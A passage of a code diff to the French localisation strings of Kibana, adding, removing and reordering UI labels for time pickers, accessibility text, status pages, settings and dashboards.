{# dernières semaines}}", - "core.euiPrettyDuration.lastDurationYears": "{duration, plural, one {# dernière année} other {# dernières années}}", - "core.euiPrettyDuration.nextDurationHours": "{duration, plural, one {# prochaine heure} other {# prochaines 
heures}}", - "core.euiPrettyDuration.nextDurationMinutes": "{duration, plural, one {# prochaine minute} other {# prochaines minutes}}", - "core.euiPrettyDuration.nextDurationMonths": "{duration, plural, one {# prochain mois} other {# prochains mois}}", - "core.euiPrettyDuration.nextDurationSeconds": "{duration, plural, one {# prochaine seconde} other {# prochaines secondes}}", - "core.euiPrettyDuration.nextDurationWeeks": "{duration, plural, one {# prochaine semaine} other {# prochaines semaines}}", - "core.euiPrettyDuration.nextDurationYears": "{duration, plural, one {# prochaine année} other {# prochaines années}}", - "core.euiPrettyDuration.nexttDurationDays": "{duration, plural, one {# prochain jour} other {# prochains jours}}", "core.euiPrettyDuration.now": "maintenant", - "core.euiPrettyInterval.days": "{interval, plural, one {# jour} other {# jours}}", - "core.euiPrettyInterval.daysShorthand": "{interval} d", - "core.euiPrettyInterval.hours": "{interval, plural, one {# heure} other {# heures}}", - "core.euiPrettyInterval.hoursShorthand": "{interval} h", - "core.euiPrettyInterval.minutes": "{interval, plural, one {# minute} other {# minutes}}", - "core.euiPrettyInterval.minutesShorthand": "{interval} m", "core.euiPrettyInterval.off": "Désactivé", - "core.euiPrettyInterval.seconds": "{interval, plural, one {# seconde} other {# secondes}}", - "core.euiPrettyInterval.secondsShorthand": "{interval} s", - "core.euiProgress.valueText": "{value} %", "core.euiQuickSelect.applyButton": "Appliquer", - "core.euiQuickSelect.fullDescription": "Actuellement défini sur {timeTense} {timeValue} {timeUnit}.", "core.euiQuickSelect.legendText": "Sélection rapide d’une plage temporelle", "core.euiQuickSelect.nextLabel": "Fenêtre temporelle suivante", "core.euiQuickSelect.previousLabel": "Fenêtre temporelle précédente", 
@@ -1586,25 +695,20 @@ "core.euiQuickSelect.unitLabel": "Unité de temps", "core.euiQuickSelect.valueLabel": "Valeur de temps", "core.euiRecentlyUsed.legend": "Plages de dates récemment utilisées", - "core.euiRefreshInterval.fullDescriptionOff": "L'actualisation est désactivée, intervalle défini sur {optionValue} {optionText}.", - "core.euiRefreshInterval.fullDescriptionOn": "L'actualisation est activée, intervalle défini sur {optionValue} {optionText}.", "core.euiRefreshInterval.legend": "Actualiser toutes les", "core.euiRelativeTab.dateInputError": "Doit être une plage valide", - "core.euiRelativeTab.fullDescription": "L'unité peut être modifiée. Elle est actuellement définie sur {unit}.", - "core.euiRelativeTab.numberInputError": "Doit être >= 0.", + "core.euiRelativeTab.numberInputError": "Doit être >= 0.", "core.euiRelativeTab.numberInputLabel": "Nombre d'intervalles", "core.euiRelativeTab.unitInputLabel": "Intervalle relatif", "core.euiResizableButton.horizontalResizerAriaLabel": "Utilisez les flèches gauche et droite pour ajuster la taille des panneaux.", "core.euiResizableButton.verticalResizerAriaLabel": "Utilisez les flèches vers le haut et vers le bas pour ajuster la taille des panneaux.", "core.euiResizablePanel.toggleButtonAriaLabel": "Appuyez pour afficher/masquer ce panneau.", - "core.euiSaturation.ariaLabel": "Curseur à 2 axes de valeur et de saturation du mode de couleur HSV", - "core.euiSaturation.screenReaderInstructions": "Utilisez les touches fléchées pour parcourir le dégradé de couleurs. Les coordonnées seront utilisées pour calculer les chiffres de \"valeur\" et de \"saturation\" du mode de couleur HSV, dans une plage de 0 à 1. Les flèches gauche et droite permettent de modifier la saturation. 
Les flèches vers le haut et vers le bas permettent de modifier la valeur.", + "core.euiSaturation.ariaLabel": "Curseur à 2 axes de valeur et de saturation du mode de couleur HSV", + "core.euiSaturation.screenReaderInstructions": "Utilisez les touches fléchées pour parcourir le dégradé de couleurs. Les coordonnées seront utilisées pour calculer les chiffres de \"valeur\" et de \"saturation\" du mode de couleur HSV, dans une plage de 0 à 1. Les flèches gauche et droite permettent de modifier la saturation. Les flèches vers le haut et vers le bas permettent de modifier la valeur.", "core.euiSelectable.loadingOptions": "Options de chargement", "core.euiSelectable.noAvailableOptions": "Aucune option disponible", - "core.euiSelectable.noMatchingOptions": "{searchValue} ne correspond à aucune option.", "core.euiSelectable.placeholderName": "Options de filtre", "core.euiSelectable.screenReaderInstructions": "Utilisez les flèches vers le haut et vers le bas pour déplacer la mise au point sur les options. Appuyez sur Entrée pour sélectionner. Appuyez sur Échap pour réduire les options.", - "core.euiSelectable.searchResults": "{resultsLength, plural, one {# résultat disponible} other {#résultats disponibles}}", "core.euiSelectableListItem.checkedOption": "Option cochée.", "core.euiSelectableListItem.checkedOptionInstructions": "Pour décocher cette option, appuyez sur Entrée.", "core.euiSelectableListItem.excludedOption": "Option exclue.", 
@@ -1617,39 +721,20 @@ "core.euiSelectableTemplateSitewide.onFocusBadgeGoTo": "Atteindre", "core.euiSelectableTemplateSitewide.searchPlaceholder": "Rechercher tout...", "core.euiStat.loadingText": "Statistiques en cours de chargement", - "core.euiStepStrings.complete": "L'étape {number} : {title} est terminée.", - "core.euiStepStrings.current": "L’étape {number} : {title} est en cours.", - "core.euiStepStrings.disabled": "L'étape {number} : {title} est désactivée.", - "core.euiStepStrings.errors": "L'étape {number} : {title} contient des erreurs.", - "core.euiStepStrings.incomplete": "L'étape {number} : {title} est incomplète.", - "core.euiStepStrings.loading": "L'étape {number} : {title} est en cours de chargement.", - "core.euiStepStrings.simpleComplete": "L'étape {number} est terminée.", - "core.euiStepStrings.simpleCurrent": "L’étape {number} est en cours.", - "core.euiStepStrings.simpleDisabled": "L'étape {number} est désactivée.", - "core.euiStepStrings.simpleErrors": "L'étape {number} contient des erreurs.", - "core.euiStepStrings.simpleIncomplete": "L'étape {number} est incomplète.", - "core.euiStepStrings.simpleLoading": "L'étape {number} est en cours de chargement.", - "core.euiStepStrings.simpleStep": "Étape {number}", - "core.euiStepStrings.simpleWarning": "L'étape {number} contient des avertissements.", - "core.euiStepStrings.step": "Étape {number} : {title}", - "core.euiStepStrings.warning": "L'étape {number} : {title} contient des avertissements.", - "core.euiSuggest.stateLoading": "État : chargement.", - "core.euiSuggest.stateSaved": "État : enregistré.", + "core.euiSuggest.stateLoading": "État : chargement.", + "core.euiSuggest.stateSaved": "État : enregistré.", "core.euiSuggest.stateSavedTooltip": "Enregistré.", - "core.euiSuggest.stateUnchanged": "État : non modifié.", - "core.euiSuggest.stateUnsaved": "État : non enregistré.", + "core.euiSuggest.stateUnchanged": "État : non modifié.", + "core.euiSuggest.stateUnsaved": "État : non enregistré.", 
"core.euiSuggest.stateUnsavedTooltip": "Les modifications n'ont pas été enregistrées.", "core.euiSuperSelect.screenReaderAnnouncement": "Vous êtes dans un sélecteur de formulaires et vous devez sélectionner une seule option. Utilisez les flèches vers le haut et vers le bas pour naviguer, ou appuyez sur Échap pour fermer.", - "core.euiSuperSelectControl.selectAnOption": "Sélectionner une option : l’option {selectedValue} est sélectionnée.", "core.euiSuperUpdateButton.cannotUpdateTooltip": "Mise à jour impossible", "core.euiSuperUpdateButton.clickToApplyTooltip": "Cliquer pour appliquer", "core.euiSuperUpdateButton.refreshButtonLabel": "Actualiser", "core.euiSuperUpdateButton.updateButtonLabel": "Mettre à jour", "core.euiSuperUpdateButton.updatingButtonLabel": "Mise à jour", - "core.euiTableHeaderCell.titleTextWithDesc": "{innerText} ; {description}", "core.euiTablePagination.allRows": "Affichage de toutes les lignes", "core.euiTablePagination.rowsPerPage": "Lignes par page", - "core.euiTablePagination.rowsPerPageOption": "{rowsPerPage} lignes", "core.euiTablePagination.rowsPerPageOptionShowAllRows": "Afficher toutes les lignes", "core.euiTableSortMobile.sorting": "Tri", "core.euiTimeOptions.days": "Jours", @@ -1696,11 +781,9 @@ "core.euiTourStep.closeTour": "Fermer la visite", "core.euiTourStep.endTour": "Terminer la visite", "core.euiTourStep.skipTour": "Ignorer la visite", - "core.euiTourStepIndicator.ariaLabel": "Étape {number} {status}", "core.euiTourStepIndicator.isActive": "active", "core.euiTourStepIndicator.isComplete": "terminée", "core.euiTourStepIndicator.isIncomplete": "incomplète", - "core.euiTreeView.ariaLabel": "{nodeLabel} enfant de {ariaLabel}", "core.euiTreeView.listNavigationInstructions": "Utilisez les touches fléchées pour parcourir rapidement cette liste.", "core.fatalErrors.clearYourSessionButtonLabel": "Effacer votre session", "core.fatalErrors.goBackButtonLabel": "Retour", 
@@ -1711,14 +794,12 @@ "core.notifications.unableUpdateUISettingNotificationMessageTitle": "Impossible de mettre à jour le paramètre de l'interface utilisateur", "core.savedObjects.deprecations.unknownTypes.manualSteps.1": "Activez les plug-ins désactivés, puis redémarrez Kibana.", "core.savedObjects.deprecations.unknownTypes.manualSteps.2": "Si aucun plug-in n'est désactivé ou si leur activation ne résout pas le problème, supprimez les documents.", - "core.savedObjects.deprecations.unknownTypes.message": "{objectCount, plural, one {# objet} other {# objets}} de type inconnu {objectCount, plural, one {a été trouvé} other {ont été trouvés}} dans les indices du système Kibana. La mise à niveau avec des types savedObject inconnus n'est plus compatible. Pour assurer la réussite des mises à niveau à l'avenir, réactivez les plug-ins ou supprimez ces documents dans les indices de Kibana", "core.savedObjects.deprecations.unknownTypes.title": "Des objets enregistrés avec des types inconnus sont présents dans les indices du système Kibana", "core.status.greenTitle": "Vert", "core.status.redTitle": "Rouge", "core.status.yellowTitle": "Jaune", "core.statusPage.coreStatus.sectionTitle": "Statut principal", - "core.statusPage.loadStatus.serverIsDownErrorMessage": "Échec de requête du statut du serveur. Votre serveur est peut-être indisponible ?", - "core.statusPage.loadStatus.serverStatusCodeErrorMessage": "Échec de requête du statut du serveur avec le code de statut {responseStatus}.", + "core.statusPage.loadStatus.serverIsDownErrorMessage": "Échec de requête du statut du serveur. Votre serveur est peut-être indisponible ?", "core.statusPage.metricsTiles.columns.heapTotalHeader": "Tas total", "core.statusPage.metricsTiles.columns.heapUsedHeader": "Tas utilisé", "core.statusPage.metricsTiles.columns.load.metaHeader": "Intervalle de charge", 
@@ -1728,11 +809,7 @@
 "core.statusPage.metricsTiles.columns.requestsPerSecHeader": "Requêtes par seconde",
 "core.statusPage.metricsTiles.columns.resTimeAvgHeader": "Temps de réponse moyen",
 "core.statusPage.metricsTiles.columns.resTimeMaxHeader": "Temps de réponse max.",
- "core.statusPage.serverStatus.statusTitle": "Statut Kibana : {kibanaStatus}",
 "core.statusPage.statusApp.loadingErrorText": "Une erreur s'est produite lors du chargement du statut.",
- "core.statusPage.statusApp.statusActions.buildText": "BUILD : {buildNum}",
- "core.statusPage.statusApp.statusActions.commitText": "COMMIT : {buildSha}",
- "core.statusPage.statusApp.statusActions.versionText": "VERSION : {versionNum}",
 "core.statusPage.statusApp.statusTitle": "Statut du plug-in",
 "core.statusPage.statusTable.columns.expandRow.collapseLabel": "Réduire",
 "core.statusPage.statusTable.columns.expandRow.expandLabel": "Développer",
@@ -1746,27 +823,23 @@
 "core.ui_settings.params.dateFormat.dayOfWeekText": "Le premier jour de la semaine",
 "core.ui_settings.params.dateFormat.dayOfWeekTitle": "Jour de la semaine",
 "core.ui_settings.params.dateFormat.optionsLinkText": "format",
- "core.ui_settings.params.dateFormat.scaled.intervalsLinkText": "Intervalles ISO8601",
- "core.ui_settings.params.dateFormat.scaledText": "Les valeurs qui définissent le format utilisé lorsque les données temporelles sont rendues dans l'ordre, et lorsque les horodatages formatés doivent s'adapter à l'intervalle entre les mesures. Les clés sont {intervalsLink}.",
+ "core.ui_settings.params.dateFormat.scaled.intervalsLinkText": "Intervalles ISO8601",
 "core.ui_settings.params.dateFormat.scaledTitle": "Format de date scalé",
- "core.ui_settings.params.dateFormat.timezone.invalidValidationMessage": "Fuseau horaire non valide : {timezone}",
 "core.ui_settings.params.dateFormat.timezoneText": "Le fuseau horaire par défaut.",
 "core.ui_settings.params.dateFormat.timezoneTitle": "Fuseau horaire",
- "core.ui_settings.params.dateFormatText": "Le {formatLink} pour des dates joliment formatées.",
 "core.ui_settings.params.dateFormatTitle": "Format de date",
- "core.ui_settings.params.dateNanosFormatText": "Le format pour les données {dateNanosLink}.",
 "core.ui_settings.params.dateNanosFormatTitle": "Date au format nanosecondes",
 "core.ui_settings.params.dateNanosLinkTitle": "date_nanos",
- "core.ui_settings.params.dayOfWeekText.invalidValidationMessage": "Jour de la semaine non valide : {dayOfWeek}",
 "core.ui_settings.params.defaultRoute.defaultRouteIsRelativeValidationMessage": "Doit être une URL relative.",
 "core.ui_settings.params.defaultRoute.defaultRouteText": "Ce paramètre spécifie le chemin par défaut lors de l'ouverture de Kibana. Vous pouvez utiliser ce paramètre pour modifier la page de destination à l'ouverture de Kibana. 
Le chemin doit être une URL relative.",
 "core.ui_settings.params.defaultRoute.defaultRouteTitle": "Chemin par défaut",
 "core.ui_settings.params.disableAnimationsText": "Désactivez toutes les animations non nécessaires dans l'interface utilisateur de Kibana. Actualisez la page pour appliquer les modifications.",
 "core.ui_settings.params.disableAnimationsTitle": "Désactiver les animations",
+ "core.ui_settings.params.hideAnnouncements": "Masquer les annonces",
+ "core.ui_settings.params.hideAnnouncementsText": "Arrêtez d’afficher les messages et les visites guidées qui mettent en avant les nouvelles fonctionnalités.",
 "core.ui_settings.params.notifications.banner.markdownLinkText": "Markdown pris en charge",
 "core.ui_settings.params.notifications.bannerLifetimeText": "La durée en millisecondes durant laquelle une notification de bannière s'affiche à l'écran. ",
 "core.ui_settings.params.notifications.bannerLifetimeTitle": "Durée des notifications de bannière",
- "core.ui_settings.params.notifications.bannerText": "Une bannière personnalisée à des fins de notification temporaire de l’ensemble des utilisateurs. {markdownLink}.",
 "core.ui_settings.params.notifications.bannerTitle": "Notification de bannière personnalisée",
 "core.ui_settings.params.notifications.errorLifetimeText": "La durée en millisecondes durant laquelle une notification d'erreur s'affiche à l'écran. ",
 "core.ui_settings.params.notifications.errorLifetimeTitle": "Durée des notifications d'erreur",
@@ -1781,23 +854,19 @@
 "core.ui.chrome.headerGlobalNav.helpMenuAskElasticTitle": "Questions Elastic",
 "core.ui.chrome.headerGlobalNav.helpMenuButtonAriaLabel": "Menu d'aide",
 "core.ui.chrome.headerGlobalNav.helpMenuDocumentation": "Documentation",
- "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackOnApp": "Donner un retour sur {appName}",
 "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackTitle": "Donner un retour",
 "core.ui.chrome.headerGlobalNav.helpMenuKibanaDocumentationTitle": "Documentation Kibana",
 "core.ui.chrome.headerGlobalNav.helpMenuOpenGitHubIssueTitle": "Ouvrir un ticket dans GitHub",
 "core.ui.chrome.headerGlobalNav.helpMenuTitle": "Aide",
- "core.ui.chrome.headerGlobalNav.helpMenuVersion": "v {version}",
 "core.ui.chrome.headerGlobalNav.logoAriaLabel": "Logo Elastic",
- "core.ui.enterpriseSearchNavList.label": "Enterprise Search",
- "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage": "Activez l'option {storeInSessionStorageParam} dans les {advancedSettingsLink} ou simplifiez les visuels à l'écran.",
+ "core.ui.enterpriseSearchNavList.label": "Enterprise Search",
 "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage.advancedSettingsLinkText": "paramètres avancés",
 "core.ui.errorUrlOverflow.bigUrlWarningNotificationTitle": "L'URL est longue et Kibana pourrait cesser de fonctionner.",
 "core.ui.errorUrlOverflow.errorTitle": "L'URL pour cet objet est trop longue, et nous ne pouvons pas l'afficher.",
 "core.ui.errorUrlOverflow.optionsToFixError.doNotUseIEText": "Veuillez utiliser un navigateur moderne. 
Tous les autres navigateurs pris en charge connus n'ont pas cette limitation.",
- "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText": "Activez l'option {storeInSessionStorageConfig} sous {kibanaSettingsLink}.",
 "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText.advancedSettingsLinkText": "Paramètres avancés",
 "core.ui.errorUrlOverflow.optionsToFixError.removeStuffFromDashboardText": "Simplifiez l'objet en cours de modification en supprimant du contenu ou des filtres.",
- "core.ui.errorUrlOverflow.optionsToFixErrorDescription": "À essayer :",
+ "core.ui.errorUrlOverflow.optionsToFixErrorDescription": "À essayer :",
 "core.ui.kibanaNavList.label": "Analytique",
 "core.ui.legacyBrowserMessage": "Cette installation Elastic présente des exigences de sécurité strictes auxquelles votre navigateur ne satisfait pas.",
 "core.ui.legacyBrowserTitle": "Merci de mettre votre navigateur à niveau.",
@@ -1810,19 +879,16 @@
 "core.ui.primaryNav.pinnedLinksAriaLabel": "Liens épinglés",
 "core.ui.primaryNav.screenReaderLabel": "Principale",
 "core.ui.primaryNav.toggleNavAriaLabel": "Activer/Désactiver la navigation principale",
- "core.ui.primaryNavSection.screenReaderLabel": "Liens de navigation principale, {category}",
- "core.ui.publicBaseUrlWarning.configRecommendedDescription": "Dans un environnement de production, il est recommandé de configurer {configKey}.",
 "core.ui.publicBaseUrlWarning.configRecommendedTitle": "Configuration recommandée",
 "core.ui.publicBaseUrlWarning.learnMoreLinkLabel": "En savoir plus.",
 "core.ui.publicBaseUrlWarning.muteWarningButtonLabel": "Avertissement de mise sur Muet",
- "core.ui.recentLinks.linkItem.screenReaderLabel": "{recentlyAccessedItemLinklabel}, type : {pageType}",
 "core.ui.recentlyViewed": "Récemment consulté",
 "core.ui.recentlyViewedAriaLabel": "Liens récemment consultés",
 "core.ui.securityNavList.label": "Security",
 "core.ui.welcomeErrorMessage": "Elastic ne s'est pas chargé correctement. Vérifiez la sortie du serveur pour plus d'informations.",
 "core.ui.welcomeMessage": "Chargement d'Elastic",
- "customIntegrations.components.replacementAccordion.comparisonPageLinkLabel": "page de comparaison",
 "customIntegrations.components.replacementAccordion.recommendationDescription": "Les intégrations d'Elastic Agent sont recommandées, mais vous pouvez également utiliser Beats. Pour plus de détails, consultez notre {link}.",
+ "customIntegrations.components.replacementAccordion.comparisonPageLinkLabel": "page de comparaison",
 "customIntegrations.components.replacementAccordionLabel": "Également disponible dans Beats",
 "customIntegrations.languageclients.DotNetDescription": "Indexez les données dans Elasticsearch avec le client .NET.",
 "customIntegrations.languageclients.DotNetTitle": "Client .NET Elasticsearch",
@@ -1844,14 +910,32 @@
 "customIntegrations.languageclients.RustTitle": "Client Rust Elasticsearch",
 "customIntegrations.placeholders.EsfDescription": "Collectez les logs à l'aide de l'application AWS Lambda disponible dans AWS Serverless Application Repository.",
 "customIntegrations.placeholders.EsfTitle": "AWS Serverless Application Repository",
- "dashboard.actions.DownloadCreateDrilldownAction.displayName": "Télécharger au format CSV",
+ "dashboard.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.",
+ "dashboard.dashboardWasNotSavedDangerMessage": "Le tableau de bord \"{dashTitle}\" n'a pas été enregistré. Erreur : {errorMessage}.",
+ "dashboard.listing.createNewDashboard.newToKibanaDescription": "Vous êtes nouveau sur Kibana ? {sampleDataInstallLink} pour découvrir l'application.",
+ "dashboard.listing.unsaved.discardAria": "Ignorer les modifications apportées à {title}",
+ "dashboard.listing.unsaved.editAria": "Poursuivre les modifications apportées à {title}",
+ "dashboard.listing.unsaved.unsavedChangesTitle": "Vous avez des modifications non enregistrées dans le {dash} suivant :",
+ "dashboard.loadingError.errorMessage": "Erreur rencontrée lors du chargement du tableau de bord enregistré : {message}",
+ "dashboard.noMatchRoute.bannerText": "L'application de tableau de bord ne reconnaît pas ce chemin : {route}.",
+ "dashboard.panel.addToLibrary.successMessage": "Le panneau {panelTitle} a été ajouté à la bibliothèque Visualize.",
+ "dashboard.panel.unableToMigratePanelDataForSixThreeZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.3.0\". 
Le panneau ne contient pas le champ attendu : {key}.",
+ "dashboard.panel.unlinkFromLibrary.successMessage": "Le panneau {panelTitle} n'est plus connecté à la bibliothèque Visualize.",
+ "dashboard.panelStorageError.clearError": "Une erreur s'est produite lors de la suppression des modifications non enregistrées : {message}.",
+ "dashboard.panelStorageError.getError": "Une erreur s'est produite lors de la récupération des modifications non enregistrées : {message}.",
+ "dashboard.panelStorageError.setError": "Une erreur s'est produite lors de la définition des modifications non enregistrées : {message}.",
+ "dashboard.share.defaultDashboardTitle": "Tableau de bord [{date}]",
+ "dashboard.strings.dashboardEditTitle": "Modification de {title}",
+ "dashboard.topNav.cloneModal.dashboardExistsDescription": "Cliquez sur {confirmClone} pour cloner le tableau de bord avec le titre dupliqué.",
+ "dashboard.topNav.cloneModal.dashboardExistsTitle": "Un tableau de bord nommé {newDashboardName} existe déjà.",
+ "dashboard.topNav.showCloneModal.dashboardCopyTitle": "Copie de {title}",
+ "dashboard.actions.DownloadCreateDrilldownAction.displayName": "Télécharger au format CSV",
 "dashboard.actions.downloadOptionsUnsavedFilename": "sans titre",
 "dashboard.actions.toggleExpandPanelMenuItem.expandedDisplayName": "Minimiser",
 "dashboard.actions.toggleExpandPanelMenuItem.notExpandedDisplayName": "Maximiser le panneau",
 "dashboard.addPanel.noMatchingObjectsMessage": "Aucun objet correspondant trouvé.",
- "dashboard.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.",
 "dashboard.appLeaveConfirmModal.cancelButtonLabel": "Annuler",
- "dashboard.appLeaveConfirmModal.unsavedChangesSubtitle": "Quitter le tableau de bord sans enregistrer ?",
+ "dashboard.appLeaveConfirmModal.unsavedChangesSubtitle": "Quitter le tableau de bord sans enregistrer ?",
 "dashboard.appLeaveConfirmModal.unsavedChangesTitle": "Modifications non enregistrées",
"dashboard.badge.readOnly.text": "Lecture seule",
 "dashboard.badge.readOnly.tooltip": "Impossible d'enregistrer les tableaux de bord",
@@ -1869,12 +953,11 @@
 "dashboard.dashboardAppBreadcrumbsTitle": "Tableau de bord",
 "dashboard.dashboardGrid.toast.unableToLoadDashboardDangerMessage": "Impossible de charger le tableau de bord.",
 "dashboard.dashboardPageTitle": "Tableaux de bord",
- "dashboard.dashboardWasNotSavedDangerMessage": "Le tableau de bord \"{dashTitle}\" n'a pas été enregistré. Erreur : {errorMessage}",
 "dashboard.dashboardWasSavedSuccessMessage": "Le tableau de bord \"{dashTitle}\" a été enregistré.",
 "dashboard.discardChangesConfirmModal.cancelButtonLabel": "Annuler",
 "dashboard.discardChangesConfirmModal.confirmButtonLabel": "Ignorer les modifications",
 "dashboard.discardChangesConfirmModal.discardChangesDescription": "Une fois les modifications ignorées, vous ne pourrez pas les récupérer.",
- "dashboard.discardChangesConfirmModal.discardChangesTitle": "Ignorer les modifications apportées au tableau de bord ?",
+ "dashboard.discardChangesConfirmModal.discardChangesTitle": "Ignorer les modifications apportées au tableau de bord ?",
 "dashboard.editorMenu.aggBasedGroupTitle": "Basé sur une agrégation",
 "dashboard.editorMenu.deprecatedTag": "Déclassé",
 "dashboard.embedUrlParamExtension.filterBar": "Barre de filtre",
@@ -1899,7 +982,6 @@
 "dashboard.listing.createNewDashboard.combineDataViewFromKibanaAppDescription": "Analysez toutes vos données Elastic en un seul endroit, en créant un tableau de bord et en ajoutant des visualisations.",
 "dashboard.listing.createNewDashboard.createButtonLabel": "Créer un tableau de bord",
 "dashboard.listing.createNewDashboard.inProgressTitle": "Tableau de bord en cours",
- "dashboard.listing.createNewDashboard.newToKibanaDescription": "Vous êtes nouveau sur Kibana ? {sampleDataInstallLink} pour découvrir l'application.",
 "dashboard.listing.createNewDashboard.sampleDataInstallLinkText": "Ajoutez des exemples de données",
 "dashboard.listing.createNewDashboard.title": "Créer votre premier tableau de bord",
 "dashboard.listing.readonlyNoItemsBody": "Aucun tableau de bord n'est disponible. Pour modifier vos autorisations afin d’afficher les tableaux de bord dans cet espace, contactez votre administrateur.",
@@ -1908,18 +990,12 @@
 "dashboard.listing.table.entityName": "tableau de bord",
 "dashboard.listing.table.entityNamePlural": "tableaux de bord",
 "dashboard.listing.table.titleColumnName": "Titre",
- "dashboard.listing.unsaved.discardAria": "Ignorer les modifications apportées à {title}",
- "dashboard.listing.unsaved.discardTitle": "Ignorer les modifications",
- "dashboard.listing.unsaved.editAria": "Poursuivre les modifications apportées à {title}",
+ "dashboard.listing.unsaved.discardTitle": "Abandonner les modifications",
 "dashboard.listing.unsaved.editTitle": "Poursuivre les modifications",
 "dashboard.listing.unsaved.loading": "Chargement",
- "dashboard.listing.unsaved.unsavedChangesTitle": "Vous avez des modifications non enregistrées dans le {dash} suivant :",
- "dashboard.loadingError.errorMessage": "Erreur rencontrée lors du chargement du tableau de bord enregistré : {message}",
 "dashboard.migratedChanges": "Certains des panneaux ont été mis à jour vers la version la plus récente.",
- "dashboard.noMatchRoute.bannerText": "L'application de tableau de bord ne reconnaît pas ce chemin : {route}.",
 "dashboard.noMatchRoute.bannerTitleText": "Page introuvable",
 "dashboard.panel.AddToLibrary": "Enregistrer dans la bibliothèque",
- "dashboard.panel.addToLibrary.successMessage": "Le panneau {panelTitle} a été ajouté à la bibliothèque Visualize.",
 "dashboard.panel.clonedToast": "Panneau cloné",
 "dashboard.panel.clonePanel": "Cloner le panneau",
 "dashboard.panel.copyToDashboard.cancel": "Annuler",
@@ -1935,24 +1011,15 @@
 "dashboard.panel.removePanel.replacePanel": "Remplacer le panneau",
 "dashboard.panel.title.clonedTag": "copier",
 "dashboard.panel.unableToMigratePanelDataForSixOneZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.1.0\". Le panneau ne contient pas les champs de colonne et/ou de ligne attendus.",
- "dashboard.panel.unableToMigratePanelDataForSixThreeZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.3.0\". Le panneau ne contient pas le champ attendu : {key}.",
 "dashboard.panel.unlinkFromLibrary": "Dissocier de la bibliothèque",
- "dashboard.panel.unlinkFromLibrary.successMessage": "Le panneau {panelTitle} n'est plus connecté à la bibliothèque Visualize.",
- "dashboard.panelStorageError.clearError": "Une erreur s'est produite lors de la suppression des modifications non enregistrées : {message}.",
- "dashboard.panelStorageError.getError": "Une erreur s'est produite lors de la récupération des modifications non enregistrées : {message}.",
- "dashboard.panelStorageError.setError": "Une erreur s'est produite lors de la définition des modifications non enregistrées : {message}.",
 "dashboard.placeholder.factory.displayName": "paramètre fictif",
 "dashboard.savedDashboard.newDashboardTitle": "Nouveau tableau de bord",
- "dashboard.share.defaultDashboardTitle": "Tableau de bord [{date}]",
 "dashboard.solutionToolbar.addPanelButtonLabel": "Créer une visualisation",
 "dashboard.solutionToolbar.editorMenuButtonLabel": "Sélectionner un type",
- "dashboard.strings.dashboardEditTitle": "Modification de {title}",
 "dashboard.topNav.cloneModal.cancelButtonLabel": "Annuler",
 "dashboard.topNav.cloneModal.cloneDashboardModalHeaderTitle": "Cloner le tableau de bord",
 "dashboard.topNav.cloneModal.confirmButtonLabel": "Confirmer le clonage",
 "dashboard.topNav.cloneModal.confirmCloneDescription": "Confirmer le clonage",
- "dashboard.topNav.cloneModal.dashboardExistsDescription": 
"Cliquez sur {confirmClone} pour cloner le tableau de bord avec le titre dupliqué.",
- "dashboard.topNav.cloneModal.dashboardExistsTitle": "Un tableau de bord nommé {newDashboardName} existe déjà.",
 "dashboard.topNav.cloneModal.enterNewNameForDashboardDescription": "Veuillez saisir un autre nom pour votre tableau de bord.",
 "dashboard.topNav.labsButtonAriaLabel": "ateliers",
 "dashboard.topNav.labsConfigDescription": "Ateliers",
@@ -1964,7 +1031,6 @@
 "dashboard.topNav.saveModal.objectType": "tableau de bord",
 "dashboard.topNav.saveModal.storeTimeWithDashboardFormRowHelpText": "Le filtre temporel est défini sur l’option sélectionnée chaque fois que ce tableau de bord est chargé.",
 "dashboard.topNav.saveModal.storeTimeWithDashboardFormRowLabel": "Enregistrer la plage temporelle avec le tableau de bord",
- "dashboard.topNav.showCloneModal.dashboardCopyTitle": "Copie de {title}",
 "dashboard.topNave.cancelButtonAriaLabel": "Basculer en mode Affichage",
 "dashboard.topNave.cloneButtonAriaLabel": "cloner",
 "dashboard.topNave.cloneConfigDescription": "Créer une copie du tableau de bord",
@@ -1982,24 +1048,100 @@
 "dashboard.topNave.shareConfigDescription": "Partager le tableau de bord",
 "dashboard.topNave.viewConfigDescription": "Basculer en mode Affichage uniquement",
 "dashboard.unsavedChangesBadge": "Modifications non enregistrées",
- "dashboard.urlWasRemovedInSixZeroWarningMessage": "L'url \"dashboard/create\" a été supprimée dans la version 6.0. Veuillez mettre vos signets à jour.",
- "data.advancedSettings.autocompleteIgnoreTimerange": "Utiliser la plage temporelle",
+ "dashboard.urlWasRemovedInSixZeroWarningMessage": "L'url \"dashboard/create\" a été supprimée dans la version 6.0. Veuillez mettre vos signets à jour.",
 "data.advancedSettings.autocompleteIgnoreTimerangeText": "Désactivez cette propriété pour obtenir des suggestions de saisie semi-automatique depuis l’intégralité de l’ensemble de données plutôt que depuis la plage temporelle définie. {learnMoreLink}",
+ "data.advancedSettings.autocompleteValueSuggestionMethodText": "La méthode utilisée pour générer des suggestions de valeur pour la saisie semi-automatique KQL. Sélectionnez terms_enum pour utiliser l'API d'énumération de termes d'Elasticsearch afin d’améliorer les performances de suggestion de saisie semi-automatique. Sélectionnez terms_agg pour utiliser l'agrégation de termes d'Elasticsearch. {learnMoreLink}",
+ "data.advancedSettings.courier.customRequestPreferenceText": "{requestPreferenceLink} utilisé lorsque {setRequestReferenceSetting} est défini sur {customSettingValue}.",
+ "data.advancedSettings.courier.maxRequestsText": "Contrôle le paramètre {maxRequestsLink} utilisé pour les requêtes _msearch envoyées par Kibana. Définir ce paramètre sur 0 permet d’utiliser la valeur Elasticsearch par défaut.",
+ "data.advancedSettings.query.allowWildcardsText": "Lorsque ce paramètre est activé, le caractère \"*\" est autorisé en tant que premier caractère dans une clause de requête. 
